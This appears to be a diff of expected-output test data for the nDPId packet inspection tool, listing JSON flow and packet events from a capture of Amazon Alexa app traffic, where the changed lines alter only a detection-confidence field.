00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976058103,"flow_last_seen":1490976058103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976058103,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1490976058103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976058103,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87D9AAEAGJ+usECrYNu8YuoT5Abs\/ELk9AAAAAKAC\/\/9McwAAAgQFtAQCCAoA9lUCAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1490976058160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5wBAAOcGhjU27xi6rBAq2AG7hPl2s2uGPxC5PnASH\/7cPAAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1490976058162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058162,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7EBAAEAGJ\/6sECrYNu8YuoT5Abs\/ELk+drNrh1AQAVcmrgAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064328,"flow_last_seen":1490976064328,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064328,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1490976064328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88S5AAEAGXAisECrYSBXOh6SkAbuyb6ZBAAAAAKAC\/\/8DBAAAAgQFtAQCCAoA9ldvAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1490976064333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064333,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WldAAEARM2CsECrYrBAqAa27ADUAKN4THgkBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1490976064389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976064389,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkwRAAOcGEz5IFc6HrBAq2AG7pKSpsxlXsm+mQnASH\/60aQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1490976064390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976064390,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8S9AAEAGXBusECrYSBXOh6SkAbuyb6ZCqbMZWFAQAVf+2gAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1490976064448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976064448,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC91iFAAEARtxSsECoBrBAq2AA1rbsAqQ1IHgmBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABFAAoDd3d3A2NkbsAQwCwABQABAAAAAwAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAEABDRV0djAQgABAAEAAAABAAQ0VdHFwEIAAQABAAAAAQAENFXRj8BCAAEAAQAAAAEABDRV0Xo="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976064448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976064448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064452,"flow_last_seen":1490976064452,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064452,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1490976064452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064452,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L2dAAEAGLj+sECrYNFXR2NSiAbtfxHgaAAAAAKAC\/\/9kOQAAAgQFtAQCCAoA9ld9AAAAAAEDAwg="} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1490976064505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064505,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71KJ+bVwJX8R4G6AScSBROQAAAgQFtAQCCAptHVo6APZXfQEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1490976064519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976064519,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0L2hAAEAGLkasECrYNFXR2NSiAbtfxHgbfm1cCoAQAVfvyQAAAQEICgD2V4NtHVo6"} -00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1490976067916,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067916,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WlhAAEARM1+sECrYrBAqAe2EADUAKHojSVQBAAABAAAAAAAAA2FwaQZhbWF6b24DY29tAAABAAE="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1490976067965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976067965,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM1zdAAEARtm+sECoBrBAq2AA17YQAOOTBSVSBgAABAAEAAAAAA2FwaQZhbWF6b24DY29tAAABAAHADAABAAEAAAAsAAQ27x2S"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976067965,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.146"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976067965,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 